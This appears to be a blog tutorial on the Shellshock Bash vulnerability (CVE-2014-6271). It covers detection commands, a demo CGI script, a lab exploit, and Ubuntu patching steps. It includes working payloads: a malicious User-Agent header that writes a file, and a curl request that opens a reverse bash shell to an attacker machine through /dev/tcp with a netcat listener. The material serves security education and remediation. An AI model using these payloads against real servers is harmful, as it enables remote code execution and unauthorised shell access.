The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash.

An attacker needs to inject their payload of code into the environment variables of a running process – and this is surprisingly easy to do, via Apache CGI scripts, DHCP options, OpenSSH and so on. When that process or its children invoke Bash, the code is picked up and executed.

The Bash flaw – designated CVE-2014-6271 [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271] – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.

The issue starts with mod_cgi and how web servers interact with CGI programs (that could be written in Perl, PHP, Shell scripting or any other language). The web server passes (environment) user variables to them so they can do their work. In simple terms, this vulnerability allows an attacker to pass a command as a variable that gets executed by bash.

It means that if you are using mod_cgi on your web server and you have a CGI written in shell script, if you have CGI’s written on any other language, but you are using “system()”, “(backticks)” or executing any commands from the CGI, you are in deep trouble. Drop everything now and patch your servers.

In a few more days we will see real scans and actual attacks attempting to exploit this Shell Shock vulnerability.

Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way. We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities.

Finding if you’re vulnerable is easier than previous vulnerabilities. Run this command:

env x='() { :;}; echo vulnerable' bash -c 'echo hello'

or

env 'VAR=() { :;}; echo vulnerable!' 'FUNCTION()=() { :;}; echo vulnerable!' bash -c "echo hello"

If you are vulnerable it will return:

vulnerable
hello

If not vulnerable it will return:

hello

Below I explained with simple example of remote code execution through vulnerable bash.

I already have a working Apache web server with mod_cgi enabled and with a simple bash script to echo “CGI Bash Bug Example” and size of root filesystem.

cat /usr/lib/cgi-bin/bashbug.sh

displays:

/usr/lib/cgi-bin/bashbug.sh

#!/bin/bash
echo “Content-type: text/html”
echo “”
echo “<html><body>CGI Bash Bug Example</body></html>”
echo `df -h / | grep -v Filesystem`

Test it:

# Delete the tmp file if is exists from a previous run.
rm -fr /tmp/tmpoutput

# Access the website, which runs the CGI script.
curl -k -H ‘User-Agent: () { :;}; echo BugFound>/tmp/tmpoutput’ https://localhost/cgi-bin/bashbug.sh

# Check the web server logs.
tail -n1 /var/log/apache2/access.log

# Check the output.
ls -l /tmp/tmpoutput

So you have a cgi file named “bashbug” that does nothing but respond with “CGI bug found”. If you call it using curl with a malicious user agent header, bash stores that header in an environment variable, but due to the bug, the code gets executed which creates the file “/tmp/tmpoutput”.

In this example I had two machines, one is Kali Linux – 192.168.31.20 and Ubuntu 14.04 – 192.168.31.5 ( Shellshock ).

From my Kali Linux machine i executed the remote command on the target Ubuntu system to create a TCP connection on port 4444 and then listen on port 4444 in my local machine using netcat.

root@kali# nc -lvp 4444

root@kali#  curl  -H  ‘x: () { :;};  /bin/bash  -i  >&  /dev/tcp/192.168.31.20/4444  0>&1’   http://192.168.31.5/cgi-bin/bashbug.sh

That’s it we successfully got the reverse connection of www-data user from the bash vulnerable system.

If you simply want to test if websites or specific CGI scripts are vulnerable, use this link:

http://shellshock.brandonpotter.com/

The easiest way to fix the vulnerability is to use your default package manager to update the version of Bash.

sudo apt-get update && sudo apt-get install --only-upgrade bash

If you are running a release of Ubuntu / Debian that is considered end of life status, you will have to upgrade to a supported to use the package manager to update Bash. The following command can be used to upgrade to a new release (it is recommended that you back up your server and important data first, in case you run into any issues):

sudo do-release-upgrade

After the upgrade is complete, ensure that you update Bash.